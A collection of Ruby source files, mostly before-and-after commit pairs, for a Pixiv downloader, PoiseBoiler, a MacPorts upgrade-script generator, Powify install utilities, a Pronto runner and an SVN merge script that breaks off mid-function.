if it.is_a?(Integer) && it != member_id
raise ArgumentError, 'member is not me'
end
pages_with_class(PrivateBookmarkList, it, opts)
end
# Downloads the image to +io_or_filename+
# @param [Pixiv::Illust] illust
# @param [#write, String, Array<String, Symbol, #call>] io_or_filename io or filename or pattern for {#filename_from_pattern}
# @param [Symbol] size image size (+:small+, +:medium+, or +:original+)
def download_illust(illust, io_or_filename, size = :original)
size = {:s => :small, :m => :medium, :o => :original}[size] || size
url = illust.__send__("#{size}_image_url")
referer = case size
when :small then nil
when :medium then illust.url
when :original then illust.original_image_referer
else raise ArgumentError, "unknown size `#{size}`"
end
save_to = io_or_filename
if save_to.is_a?(Array)
save_to = filename_from_pattern(save_to, illust, url)
end
FileUtils.mkdir_p(File.dirname(save_to)) unless save_to.respond_to?(:write)
@agent.download(url, save_to, [], referer)
end
# Downloads the images to +pattern+
# @param [Pixiv::Illust] illust the manga to download
# @param [Array<String, Symbol, #call>] pattern pattern for {#filename_from_pattern}
# @note +illust#manga?+ must be +true+
# @todo Document +&block+
def download_manga(illust, pattern, &block)
action = DownloadActionRegistry.new(&block)
illust.original_image_urls.each_with_index do |url, n|
begin
action.before_each.call(url, n) if action.before_each
filename = filename_from_pattern(pattern, illust, url)
FileUtils.mkdir_p(File.dirname(filename))
@agent.download(url, filename, [], illust.original_image_referer)
action.after_each.call(url, n) if action.after_each
rescue
action.on_error ? action.on_error.call($!) : raise
end
end
end
# Generate filename from +pattern+ in context of +illust+ and +url+
#
# @api private
# @param [Array<String, Symbol, #call>] pattern
# @param [Pixiv::Illust] illust
# @param [String] url
# @return [String] filename
#
# The +pattern+ is an array of string, symbol, or object that responds to +#call+.
# Each component of the +pattern+ is replaced by the following rules and then
# the +pattern+ is concatenated as the returning +filename+.
#
# * +:image_name+ in the +pattern+ is replaced with the base name of the +url+
# * Any other symbol is replaced with the value of +illust.__send__(the_symbol)+
# * +#call+-able object is replaced with the value of +the_object.call(illust)+
# * String is left as-is
def filename_from_pattern(pattern, illust, url)
pattern.map {|i|
if i == :image_name
name = File.basename(url)
if name =~ /\.(\w+)\?\d+$/
name += '.' + $1
end
name
elsif i.is_a?(Symbol) then illust.__send__(i)
elsif i.respond_to?(:call) then i.call(illust)
else i
end
}.join('')
end
protected
def page_list_with_class(list_class, member_or_member_id, page_num = 1)
it = member_or_member_id
member_id = it.is_a?(Member) ? it.member_id : it
attrs = {member_id: member_id, page_num: page_num}
list_class.lazy_new(attrs) {
agent.get(list_class.url(member_id, page_num))
}
end
def pages_with_class(list_class, list_or_member, opts = {})
if list_or_member.is_a?(list_class)
list = list_or_member
else
list = page_list_with_class(list_class, list_or_member)
end
PageCollection::Enumerator.new(self, list, !!opts[:include_deleted])
end
def ensure_logged_in
doc = agent.get("#{ROOT_URL}/mypage.php")
raise Error::LoginFailed unless doc.body =~ /logout/
@member_id = member_id_from_mypage(doc)
end
def member_id_from_mypage(doc)
doc.at('.profile_area a')['href'].match(/(\d+)$/).to_a[1].to_i
end
end
# @private
class DownloadActionRegistry
def initialize(&block)
instance_eval(&block) if block
end
def before_each(&block)
block ? (@before_each = block) : @before_each
end
def after_each(&block)
block ? (@after_each = block) : @after_each
end
def on_error(&block)
block ? (@on_error = block) : @on_error
end
end
end
|
#
# Copyright 2015, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'poise_boiler/kitchen'
module PoiseBoiler
def self.include_halite_spec_helper
@include_halite_spec_helper.nil? ? true : @include_halite_spec_helper
end
def self.include_halite_spec_helper=(val)
@include_halite_spec_helper = val
end
# (see PoiseBoiler::Kitchen.kitchen)
def self.kitchen(platforms: 'ubuntu-14.04')
# Alias in a top-level namespace to reduce typing.
Kitchen.kitchen(platforms: platforms)
end
end
Move class methods to a class << self because it makes Yard happier and ¯\_(ツ)_/¯.
#
# Copyright 2015, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'poise_boiler/kitchen'
module PoiseBoiler
class << self
# @!attribute include_halite_spec_helper
# Enable/disable Halite::SpecHelper when configuring RSpec.
#
# @since 1.0.0
# @return [Boolean] Include/don't include Halite::SpecHelper.
# @example
# require 'poise_boiler'
# PoiseBoiler.include_halite_spec_helper = false
# require 'poise_boiler/spec_helper'
def include_halite_spec_helper
defined?(@include_halite_spec_helper) ? @include_halite_spec_helper : true
end
def include_halite_spec_helper=(val)
@include_halite_spec_helper = val
end
# (see PoiseBoiler::Kitchen.kitchen)
def kitchen(platforms: 'ubuntu-14.04')
# Alias in a top-level namespace to reduce typing.
Kitchen.kitchen(platforms: platforms)
end
end
end
|
#
# ports_helpers.rb: Utility classes for dealing with ports data.
#
# ====================================================================
# Copyright (c) 2008 Tony Doan <tdoan@tdoan.com>. All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://github.com/tdoan/port_upgrade/tree/master/COPYING.
# If newer versions of this license are posted there, you may use a
# newer version instead, at your option.
# ====================================================================
#
$:.unshift(File.dirname(__FILE__)) unless
$:.include?(File.dirname(__FILE__)) || $:.include?(File.expand_path(File.dirname(__FILE__)))
require 'bz2'
require 'find'
require 'sqlite3'
class String
def dot_clean
return self.gsub(/[ +\/\.-]/,"_")
end
end
module Ports
VERSION = '0.0.4'
RECEIPT_PATH = '/opt/local/var/macports/receipts'
MACPORTS_DB='/opt/local/var/macports/sources/rsync.macports.org/release/ports'
CONFIG_FILE = 'port_upgrade.conf'
Struct.new('Edge',:port,:dep,:level)
class Struct::Edge
def <=>(other)
portdif = self.port <=> other.port
depdif = self.dep <=> other.dep
if self.port == other.port and self.dep == other.dep and self.level == other.level
return 0
elsif portdif != 0
return portdif
elsif depdif != 0
return depdif
else
return self.level <=> other.level
end
end
end
class Utilities
def breadth_first
end
def self.cmp_vers(versa,versb)
va = Version.new(versa)
vb = Version.new(versb)
return va <=> vb
end
end
class Port
end
class PortTree
def initialize(pdb,path=nil)
@path=path
@edges_seen = []
@pdb = pdb
traverse_receipts
end
def size
s=nil
@pdb.db.query("select count(*) from ports") do |results|
s = results.first[0].to_i
end
return s
end
def receipt_path
@path || RECEIPT_PATH
end
def dump_tree
ports = nil
@pdb.db.query("select port,variant from ports order by port") do |results|
ports = results.to_a
end
ports
end
def installed
ports = nil
@pdb.db.query("select port from ports order by port") do |results|
ports = results.to_a.flatten
end
ports
end
def dump_seq(outdated)
#setup_remports(outdated) unless outdated.nil?
end
def setup_remports(outdated)
begin
@pdb.db.execute("drop table remports")
rescue SQLite3::SQLException
end
@pdb.db.execute("create table remports(port text, dep text)")
@pdb.db.execute("create unique index remportsdep on remports(port,dep)")
outdated.each do |a|
parents = get_parent_pairs(a)
begin
parents.each do |p|
@pdb.db.execute("insert or ignore into remports values(\"#{p.port}\",\"#{p.dep}\")")
end
rescue SQLite3::SQLException => exp
$stderr.puts "Dup insert into remports: #{exp}}" if $DEBUG
end
@pdb.db.execute("insert into remports values(\"#{a}\",\"\")")
end
@pdb.db.execute('delete from remports where port="gimp-app" and dep="gimp"')
#File.open("remtree.dot",'w') do |f|
# pt = table_to_tree('remports','remports','port','port','dep')
# f.write(pt.to_dot)
#end
end
private
def traverse_receipts
begin
@pdb.db.execute("drop table ports")
@pdb.db.execute("drop table deps")
rescue SQLite3::SQLException
end
@pdb.db.execute("create table ports(port text,version text, variant text)")
@pdb.db.execute("create table deps(port text, dep text)")
@pdb.db.execute("create unique index uniqdep on deps(port,dep)")
receipt_size = receipt_path.split("/").size
Find.find(receipt_path) do |filename|
next unless filename =~ /.bz2$/
next unless File.stat(filename).file?
pieces = filename.split("/")
next unless (pieces.size - receipt_size) == 3
original_portname = pieces[-3]
md = /([^+]+)((\+\w+)*)/.match(pieces[-2]) #seperate version from variants
version = md[1]
variant = md[2]
portname = filename.split("/")[-3].gsub(/(-|\.|\/)/,'_') #very unix centric
@pdb.db.execute("insert into ports values(?,?,?)",original_portname,version,variant)
#portnames << "#{portname}"
reader = BZ2::Reader.new(File.open(filename))
receipt_lines = reader.readlines
reader.close
receipt_lines.each do |l|
if l =~ /depends_lib (\{([^}]*)\}|([^ ]*))/
deps = $2||$3
deps.split(" ").each do |d|
original_depname = d.split(":").last
depname = d.split(":").last.gsub(/(-|\.|\/)/,'_')
begin
@pdb.db.execute("insert into deps values(?,?)",original_portname,original_depname)
rescue SQLite3::SQLException
end
end
end
if l =~ /depends_run (\{([^}]*)\}|([^ ]*))/
deps = $2||$3
deps.split(" ").each do |d|
original_depname = d.split(":").last
depname = d.split(":")[1].gsub(/(-|\.|\/)/,'_')
begin
@pdb.db.execute("insert into deps values(?,?)",original_portname,original_depname)
rescue SQLite3::SQLException
end
end
end
end
end
end
def get_parent_pairs(portname,i=1)
$stderr.puts "get_parent_pairs: #{portname}, #{i}" if $DEBUG
rs = @pdb.db.query("select * from deps where dep = ?", portname)
res = rs.to_a
if res.size == 0
parents = []
else
parents = res.collect{|r| Struct::Edge.new(r[0],portname,i)}
res.each do |r|
if (@edges_seen.find{|o| o === [r[0],portname]}).nil?
@edges_seen << [r[0],portname]
gp = get_parent_pairs(r[0],i+1)
parents += gp unless gp.size == 0
end
end
end
rs.close
parents.uniq
end
end
class PortsDB
def initialize(path=nil,outdated=nil)
@db = SQLite3::Database.new(':memory:')#('port_tree.db')
@pt = PortTree.new(self,path)
@installed = @pt.installed
@outdated = outdated
@to_remove = nil
config_file = locate_config_file
unless config_file.nil?
begin
@config = YAML::load(File.open(config_file))
@config = {} if @config == false
rescue Errno::ENOENT
$stderr.puts("No configuration loaded.")
end
else
$stderr.puts("No configuration loaded.")
end
end
def locate_config_file
to_search = []
local_dir = File.dirname($0).sub(/bin$/,"")
local_dir = local_dir == "" ? "." : local_dir
to_search << File.join(local_dir,"etc",Ports::CONFIG_FILE)
to_search << File.join(ENV['HOME'],"."+Ports::CONFIG_FILE)
to_search.each do |path|
return path if File.readable?(path)
end
return nil
end
def installed
@installed
end
def db
@db
end
def close
@db.close
end
def port_tree
@pt
end
def dump_tree
@installed.dump_tree
end
def to_remove
return @to_remove unless @to_remove.nil?
@pt.setup_remports(outdated)
@db.query("select distinct port from remports order by port") do |rs|
@to_remove = rs.to_a
end
end
def get_leaves
$stderr.print "get_leaves " if $DEBUG
rs = @db.query('select port from remports')
ports = rs.to_a.flatten.sort.uniq
rs.close
$stderr.print "ports: #{ports.size} " if $DEBUG
rs = @db.query('select dep from remports')
deps = rs.to_a.flatten.sort.uniq
rs.close
$stderr.print "deps: #{deps.size} " if $DEBUG
diff = (ports - deps).sort
$stderr.puts "diff: #{diff.size}" if $DEBUG
diff.each{|p| @db.execute("delete from remports where port = ?",p)}
diff
end
def set_outdated(out)
@outdated = out
end
def outdated(reload = false)
return @outdated unless @outdated.nil? or reload == true
@outdated = []
@installed.each do |port|
d = File.join(@pt.receipt_path,port)
Dir.entries(d)[2..-1].each do |version|
d2 = File.join(d,version,'receipt.bz2')
reader = BZ2::Reader.new(File.new(d2))
lines = reader.readlines
cats = []
lines.collect do |line|
md = /categories (\{([^}]*)\}|([^ ]*))/.match(line)
unless md.nil?
cats << (md[2].nil? ? md[1] : md[2].split.first)
end
end
portfile_path = File.join(MACPORTS_DB,cats.flatten,port,'Portfile')
unless File.exist?(portfile_path)
$stderr.puts "Searching for #{port}'s Portfile"
Dir.entries(MACPORTS_DB).each do |d|
if File.directory?(File.join(MACPORTS_DB,d)) && d != '.' && d != '..'
testpath = File.join(MACPORTS_DB,d,port,'Portfile')
if File.exist?(testpath)
portfile_path = testpath
break
end
end
end
end
if File.exist?(portfile_path)
curver = Portfile.new(portfile_path).version
#puts "%-32s%s < %s" %[port,version.split('+').first,curver] if Ports::Utilities.cmp_vers(version.split('+').first,curver) < 0
$stderr.puts("#{port}: #{version.split('+').first}, #{curver}") if $verbose
cmp = Ports::Utilities.cmp_vers(version.split('+').first,curver)
if cmp.nil?
$stderr.puts "Unable to compare versions: #{[port]}"
else
if cmp < 0
@outdated << port
end
end
else
$stderr.puts "Unable to process Portfile (File Not Found) for #{port}"
end
end
end
@outdated.uniq
end
def upgrade(path='port_upgrade.sh')
@pt.setup_remports(outdated) if @to_remove.nil?
remports = []
remvariants = Hash.new {|h,k| h[k] = Array.new}
stmt = @db.prepare("select count(*) from remports")
dotsh = File.new(path,'w')
dotsh.chmod(0700)
$stderr.puts "port_upgrade.sh open for write" if $DEBUG
dotsh.puts("#!/bin/sh")
while stmt.execute.to_a.first[0].to_i > 0
temp = get_leaves
break if temp.size == 0
temp.each do |o|
@db.query("select port,version,variant from ports where port = ?",o) do |rs|
installed = rs.to_a
installed.each do |port|
bu = get_before_uninstall(port[0])
dotsh.puts(bu) unless bu.nil?
dotsh.puts("port uninstall #{port[0]} @#{port[1]}#{port[2]} || exit -1")
au = get_after_uninstall(port[0])
dotsh.puts(au) unless au.nil?
remports.push(port[0])
remvariants[port[0]].push(port[2])
end
end
end
end
remports.uniq!
while remports.size > 0
port = remports.pop
if remvariants[port].uniq.size > 1
$stderr.puts "Found multiple variants for #{port}."
variantindex = choose_variant(port,remvariants[port])
else
variantindex = 0
end
bi = get_before_install(port)
dotsh.puts(bi) unless bi.nil?
dotsh.puts("port #{get_force(port)} -x install #{port} #{remvariants[port][variantindex]} || exit -1")
ai = get_after_install(port)
dotsh.puts(ai) unless ai.nil?
end
stmt.close
true
end
def get_force(portname)
force = get_port_action(portname,:force_install)
if force
return "-f"
else
return ""
end
end
def get_before_uninstall(portname)
get_port_action(portname,:before_uninstall)
end
def get_after_uninstall(portname)
get_port_action(portname,:after_uninstall)
end
def get_before_install(portname)
get_port_action(portname,:before_install)
end
def get_after_install(portname)
get_port_action(portname,:after_install)
end
private
def get_port_action(portname,type)
unless @config.nil?
if @config.has_key?(:actions)
if @config[:actions].has_key?(portname)
if @config[:actions][portname].has_key?(type)
@config[:actions][portname][type]
else
nil
end
end
end
end
end
def choose_variant(portname,variants)
answer=false
while(!answer)
$stderr.puts "Please choose from list:"
variants.each_with_index{|v,i| $stderr.puts "#{i}: #{v=="" ? "(none)" : v}"}
$stderr.print "> "
reply = $stdin.gets
clean = (reply.strip =~ /-?[0-9]+/)
if (clean == 0)
answer = true
else
$stderr.puts "ERROR, try again."
end
end
return reply.to_i
end
end
class Portfile
def initialize(path)
@path = path
end
def version
@version ||= find_vers
end
private
def find_vers
v=nil
rev=nil
vars = {}
portfile = File.new(@path)
portfile.each do |line|
case line
when /^set\s+(\S+)\s+(\S+)/
vars[$1] = $2
#$stderr.puts "Var: #{$1} Val: #{$2}"
when /^version\s+([^\s]+)/
v = $1
while(v =~ /(\$\{([^}]+)\})/) do
if vars.has_key?($2)
v[$1] = vars[$2]
else
break
end
#$stderr.puts "\n\nREPLACE(#{@path}): #{$1} #{vars[$2]} #{v}\n"
end
#break
when /^revision\s+([^\s]+)/
rev = $1
#$stderr.puts "revision found #{rev}"
when /(\w+\.setup\s+\{[^\}]+\}\s+([^\s]+)|^\w+\.setup\s+[^ ]+ (.*))/
v = $2 || $3 if v.nil?
break
when /(\S+)\s+([^$]+)$/
vars[$1] = $2
end
end
rev = "0" if rev.nil?
v = v +"_"+rev
return v
end
end
end
Fix issue where there is more than one version of a port to be uninstalled.
#
# ports_helpers.rb: Utility classes for dealing with ports data.
#
# ====================================================================
# Copyright (c) 2008 Tony Doan <tdoan@tdoan.com>. All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://github.com/tdoan/port_upgrade/tree/master/COPYING.
# If newer versions of this license are posted there, you may use a
# newer version instead, at your option.
# ====================================================================
#
$:.unshift(File.dirname(__FILE__)) unless
$:.include?(File.dirname(__FILE__)) || $:.include?(File.expand_path(File.dirname(__FILE__)))
require 'bz2'
require 'find'
require 'sqlite3'
class String
def dot_clean
return self.gsub(/[ +\/\.-]/,"_")
end
end
module Ports
VERSION = '0.0.4'
RECEIPT_PATH = '/opt/local/var/macports/receipts'
MACPORTS_DB='/opt/local/var/macports/sources/rsync.macports.org/release/ports'
CONFIG_FILE = 'port_upgrade.conf'
Struct.new('Edge',:port,:dep,:level)
class Struct::Edge
def <=>(other)
portdif = self.port <=> other.port
depdif = self.dep <=> other.dep
if self.port == other.port and self.dep == other.dep and self.level == other.level
return 0
elsif portdif != 0
return portdif
elsif depdif != 0
return depdif
else
return self.level <=> other.level
end
end
end
class Utilities
def breadth_first
end
def self.cmp_vers(versa,versb)
va = Version.new(versa)
vb = Version.new(versb)
return va <=> vb
end
end
class Port
end
class PortTree
def initialize(pdb,path=nil)
@path=path
@edges_seen = []
@pdb = pdb
traverse_receipts
end
def size
s=nil
@pdb.db.query("select count(*) from ports") do |results|
s = results.first[0].to_i
end
return s
end
def receipt_path
@path || RECEIPT_PATH
end
def dump_tree
ports = nil
@pdb.db.query("select port,variant from ports order by port") do |results|
ports = results.to_a
end
ports
end
def installed
ports = nil
@pdb.db.query("select port from ports order by port") do |results|
ports = results.to_a.flatten
end
ports
end
def dump_seq(outdated)
#setup_remports(outdated) unless outdated.nil?
end
def setup_remports(outdated)
begin
@pdb.db.execute("drop table remports")
rescue SQLite3::SQLException
end
@pdb.db.execute("create table remports(port text, dep text)")
@pdb.db.execute("create unique index remportsdep on remports(port,dep)")
outdated.each do |a|
parents = get_parent_pairs(a)
begin
parents.each do |p|
@pdb.db.execute("insert or ignore into remports values(\"#{p.port}\",\"#{p.dep}\")")
end
rescue SQLite3::SQLException => exp
$stderr.puts "Dup insert into remports: #{exp}}" if $DEBUG
end
@pdb.db.execute("insert or ignore into remports values(\"#{a}\",\"\")")
end
@pdb.db.execute('delete from remports where port="gimp-app" and dep="gimp"')
#File.open("remtree.dot",'w') do |f|
# pt = table_to_tree('remports','remports','port','port','dep')
# f.write(pt.to_dot)
#end
end
private
def traverse_receipts
begin
@pdb.db.execute("drop table ports")
@pdb.db.execute("drop table deps")
rescue SQLite3::SQLException
end
@pdb.db.execute("create table ports(port text,version text, variant text)")
@pdb.db.execute("create table deps(port text, dep text)")
@pdb.db.execute("create unique index uniqdep on deps(port,dep)")
receipt_size = receipt_path.split("/").size
Find.find(receipt_path) do |filename|
next unless filename =~ /.bz2$/
next unless File.stat(filename).file?
pieces = filename.split("/")
next unless (pieces.size - receipt_size) == 3
original_portname = pieces[-3]
md = /([^+]+)((\+\w+)*)/.match(pieces[-2]) #seperate version from variants
version = md[1]
variant = md[2]
portname = filename.split("/")[-3].gsub(/(-|\.|\/)/,'_') #very unix centric
@pdb.db.execute("insert into ports values(?,?,?)",original_portname,version,variant)
#portnames << "#{portname}"
reader = BZ2::Reader.new(File.open(filename))
receipt_lines = reader.readlines
reader.close
receipt_lines.each do |l|
if l =~ /depends_lib (\{([^}]*)\}|([^ ]*))/
deps = $2||$3
deps.split(" ").each do |d|
original_depname = d.split(":").last
depname = d.split(":").last.gsub(/(-|\.|\/)/,'_')
begin
@pdb.db.execute("insert into deps values(?,?)",original_portname,original_depname)
rescue SQLite3::SQLException
end
end
end
if l =~ /depends_run (\{([^}]*)\}|([^ ]*))/
deps = $2||$3
deps.split(" ").each do |d|
original_depname = d.split(":").last
depname = d.split(":")[1].gsub(/(-|\.|\/)/,'_')
begin
@pdb.db.execute("insert into deps values(?,?)",original_portname,original_depname)
rescue SQLite3::SQLException
end
end
end
end
end
end
def get_parent_pairs(portname,i=1)
$stderr.puts "get_parent_pairs: #{portname}, #{i}" if $DEBUG
rs = @pdb.db.query("select * from deps where dep = ?", portname)
res = rs.to_a
if res.size == 0
parents = []
else
parents = res.collect{|r| Struct::Edge.new(r[0],portname,i)}
res.each do |r|
if (@edges_seen.find{|o| o === [r[0],portname]}).nil?
@edges_seen << [r[0],portname]
gp = get_parent_pairs(r[0],i+1)
parents += gp unless gp.size == 0
end
end
end
rs.close
parents.uniq
end
end
class PortsDB
def initialize(path=nil,outdated=nil)
@db = SQLite3::Database.new(':memory:')#('port_tree.db')
@pt = PortTree.new(self,path)
@installed = @pt.installed
@outdated = outdated
@to_remove = nil
config_file = locate_config_file
unless config_file.nil?
begin
@config = YAML::load(File.open(config_file))
@config = {} if @config == false
rescue Errno::ENOENT
$stderr.puts("No configuration loaded.")
end
else
$stderr.puts("No configuration loaded.")
end
end
def locate_config_file
to_search = []
local_dir = File.dirname($0).sub(/bin$/,"")
local_dir = local_dir == "" ? "." : local_dir
to_search << File.join(local_dir,"etc",Ports::CONFIG_FILE)
to_search << File.join(ENV['HOME'],"."+Ports::CONFIG_FILE)
to_search.each do |path|
return path if File.readable?(path)
end
return nil
end
def installed
@installed
end
def db
@db
end
def close
@db.close
end
def port_tree
@pt
end
def dump_tree
@installed.dump_tree
end
def to_remove
return @to_remove unless @to_remove.nil?
@pt.setup_remports(outdated)
@db.query("select distinct port from remports order by port") do |rs|
@to_remove = rs.to_a
end
end
def get_leaves
$stderr.print "get_leaves " if $DEBUG
rs = @db.query('select port from remports')
ports = rs.to_a.flatten.sort.uniq
rs.close
$stderr.print "ports: #{ports.size} " if $DEBUG
rs = @db.query('select dep from remports')
deps = rs.to_a.flatten.sort.uniq
rs.close
$stderr.print "deps: #{deps.size} " if $DEBUG
diff = (ports - deps).sort
$stderr.puts "diff: #{diff.size}" if $DEBUG
diff.each{|p| @db.execute("delete from remports where port = ?",p)}
diff
end
def set_outdated(out)
@outdated = out
end
def outdated(reload = false)
return @outdated unless @outdated.nil? or reload == true
@outdated = []
@installed.each do |port|
d = File.join(@pt.receipt_path,port)
Dir.entries(d)[2..-1].each do |version|
d2 = File.join(d,version,'receipt.bz2')
reader = BZ2::Reader.new(File.new(d2))
lines = reader.readlines
cats = []
lines.collect do |line|
md = /categories (\{([^}]*)\}|([^ ]*))/.match(line)
unless md.nil?
cats << (md[2].nil? ? md[1] : md[2].split.first)
end
end
portfile_path = File.join(MACPORTS_DB,cats.flatten,port,'Portfile')
unless File.exist?(portfile_path)
$stderr.puts "Searching for #{port}'s Portfile"
Dir.entries(MACPORTS_DB).each do |d|
if File.directory?(File.join(MACPORTS_DB,d)) && d != '.' && d != '..'
testpath = File.join(MACPORTS_DB,d,port,'Portfile')
if File.exist?(testpath)
portfile_path = testpath
break
end
end
end
end
if File.exist?(portfile_path)
curver = Portfile.new(portfile_path).version
#puts "%-32s%s < %s" %[port,version.split('+').first,curver] if Ports::Utilities.cmp_vers(version.split('+').first,curver) < 0
$stderr.puts("#{port}: #{version.split('+').first}, #{curver}") if $verbose
cmp = Ports::Utilities.cmp_vers(version.split('+').first,curver)
if cmp.nil?
$stderr.puts "Unable to compare versions: #{[port]}"
else
if cmp < 0
@outdated << port
end
end
else
$stderr.puts "Unable to process Portfile (File Not Found) for #{port}"
end
end
end
@outdated.uniq
end
def upgrade(path='port_upgrade.sh')
@pt.setup_remports(outdated) if @to_remove.nil?
remports = []
remvariants = Hash.new {|h,k| h[k] = Array.new}
stmt = @db.prepare("select count(*) from remports")
dotsh = File.new(path,'w')
dotsh.chmod(0700)
$stderr.puts "port_upgrade.sh open for write" if $DEBUG
dotsh.puts("#!/bin/sh")
while stmt.execute.to_a.first[0].to_i > 0
temp = get_leaves
break if temp.size == 0
temp.each do |o|
@db.query("select port,version,variant from ports where port = ?",o) do |rs|
installed = rs.to_a
installed.each do |port|
bu = get_before_uninstall(port[0])
dotsh.puts(bu) unless bu.nil?
dotsh.puts("port uninstall #{port[0]} @#{port[1]}#{port[2]} || exit -1")
au = get_after_uninstall(port[0])
dotsh.puts(au) unless au.nil?
remports.push(port[0])
remvariants[port[0]].push(port[2])
end
end
end
end
remports.uniq!
while remports.size > 0
port = remports.pop
if remvariants[port].uniq.size > 1
$stderr.puts "Found multiple variants for #{port}."
variantindex = choose_variant(port,remvariants[port])
else
variantindex = 0
end
bi = get_before_install(port)
dotsh.puts(bi) unless bi.nil?
dotsh.puts("port #{get_force(port)} -x install #{port} #{remvariants[port][variantindex]} || exit -1")
ai = get_after_install(port)
dotsh.puts(ai) unless ai.nil?
end
stmt.close
true
end
def get_force(portname)
force = get_port_action(portname,:force_install)
if force
return "-f"
else
return ""
end
end
def get_before_uninstall(portname)
get_port_action(portname,:before_uninstall)
end
def get_after_uninstall(portname)
get_port_action(portname,:after_uninstall)
end
def get_before_install(portname)
get_port_action(portname,:before_install)
end
def get_after_install(portname)
get_port_action(portname,:after_install)
end
private
def get_port_action(portname,type)
unless @config.nil?
if @config.has_key?(:actions)
if @config[:actions].has_key?(portname)
if @config[:actions][portname].has_key?(type)
@config[:actions][portname][type]
else
nil
end
end
end
end
end
def choose_variant(portname,variants)
answer=false
while(!answer)
$stderr.puts "Please choose from list:"
variants.each_with_index{|v,i| $stderr.puts "#{i}: #{v=="" ? "(none)" : v}"}
$stderr.print "> "
reply = $stdin.gets
clean = (reply.strip =~ /-?[0-9]+/)
if (clean == 0)
answer = true
else
$stderr.puts "ERROR, try again."
end
end
return reply.to_i
end
end
class Portfile
def initialize(path)
@path = path
end
def version
@version ||= find_vers
end
private
def find_vers
v=nil
rev=nil
vars = {}
portfile = File.new(@path)
portfile.each do |line|
case line
when /^set\s+(\S+)\s+(\S+)/
vars[$1] = $2
#$stderr.puts "Var: #{$1} Val: #{$2}"
when /^version\s+([^\s]+)/
v = $1
while(v =~ /(\$\{([^}]+)\})/) do
if vars.has_key?($2)
v[$1] = vars[$2]
else
break
end
#$stderr.puts "\n\nREPLACE(#{@path}): #{$1} #{vars[$2]} #{v}\n"
end
#break
when /^revision\s+([^\s]+)/
rev = $1
#$stderr.puts "revision found #{rev}"
when /(\w+\.setup\s+\{[^\}]+\}\s+([^\s]+)|^\w+\.setup\s+[^ ]+ (.*))/
v = $2 || $3 if v.nil?
break
when /(\S+)\s+([^$]+)$/
vars[$1] = $2
end
end
rev = "0" if rev.nil?
v = v +"_"+rev
return v
end
end
end
|
require 'json'
# powify server functions
# invoked via powify utils [COMMAND] [ARGS]
module Powify
class Utils
AVAILABLE_METHODS = %w(install reinstall uninstall remove help)
class << self
def run(args = [])
method = args[0].to_s.downcase
raise "The command `#{args.first}` does not exist for `powify utils`!" unless Powify::Utils::AVAILABLE_METHODS.include?(method)
self.send(method)
end
protected
# Install powify.dev
def install
uninstall
%x{git clone git@github.com:sethvargo/powify.dev.git powify && cd powify && bundle install --deployment && cd .. && mv powify #{config['hostRoot']}}
end
alias_method :reinstall, :install
# Uninstall powify.dev
def uninstall
%x{rm -rf #{config['hostRoot']}/powify}
end
alias_method :remove, :uninstall
def config
result = %x{curl localhost/config.json --silent --header host:pow}
JSON.parse(result)
end
end
end
end
debugging
require 'json'
# powify server functions
# invoked via powify utils [COMMAND] [ARGS]
module Powify
class Utils
AVAILABLE_METHODS = %w(install reinstall uninstall remove help)
class << self
def run(args = [])
method = args[0].to_s.downcase
raise "The command `#{args.first}` does not exist for `powify utils`!" unless Powify::Utils::AVAILABLE_METHODS.include?(method)
self.send(method)
end
protected
# Install powify.dev
def install
uninstall
$stdouts.puts "Cloning powify.dev from github..."
%x{git clone -q git@github.com:sethvargo/powify.dev.git powify && cd powify && bundle install --deployment && cd .. && mv powify "#{config['hostRoot']}"}
$stdouts.puts "Done!"
end
alias_method :reinstall, :install
# Uninstall powify.dev
def uninstall
%x{rm -rf #{config['hostRoot']}/powify}
$stdout.puts "Successfully removed powify.dev"
end
alias_method :remove, :uninstall
def config
result = %x{curl localhost/config.json --silent --header host:pow}
JSON.parse(result)
end
end
end
end |
Implement Poper runner
require 'pronto'
require 'poper'
module Pronto
class Poper < Runner
def run(patches, commit)
return [] unless patches
poper_runner = ::Poper::Runner.new(commit, patches.owner.repo.path)
errors = poper_runner.run
messages_for(patches, errors)
end
def messages_for(patches, errors)
errors.map do |error|
Message.new(nil, nil, :warning, error.message.capitalize, error.commit)
end
end
end
end
|
Added propagate script for safe keeping.
#!/usr/bin/env ruby
# $Id: propagate 351 2009-05-29 17:50:45Z mschaffe $
require 'pathname'
require 'rexml/document'
require 'fileutils'
def usage
<<EOF
Usage: #{File.basename($0)} <changeset>
Merges the given changeset from your current branch into any sibling
branches that are alphabetically higher than the current branch.
Your current branch is:
- #{working_copy_url}
Running propagate from this branch will merge into the following branches:
- #{greater_siblings(working_copy_url).join("\n - ")}
EOF
end
def working_copy_url(path = ".")
`svn info #{path}`.match(/URL: (.*)$/)[1]
end
def greater_siblings(url)
directory = url_split(url).last
siblings(url).find_all { |s| s > directory }
end
def siblings(url)
ls(parent(url)).map do |item|
item[0..-2] if item =~ /\/$/
end.compact
end
def ls(url)
`svn ls "#{url}"`.split(/\n/)
end
def url_split(url)
Pathname.new(url).split.map { |p| p.to_s }
end
def parent(url)
url_split(url).first
end
def log(changeset, url)
log = `svn log --xml -r #{changeset} #{url}`
abort unless log
REXML::Document.new(log).root.elements['logentry'].elements['msg'].text or '' rescue abort "Changeset #{changeset} doesn't exist on this branch."
end
def update(remote, local)
if File.exist?(local)
puts "Updating local copy of #{local}..."
`svn up "#{local}"`
else
puts "Checking out #{remote} to #{local}..."
`svn co "#{remote}" "#{local}"`
end
end
def using_svn_1_5?
`svn --version` =~ /version 1\.5/
end
def merge(from, to, source, dryrun = false)
command = %(svn merge -r#{from}:#{to} "#{source}")
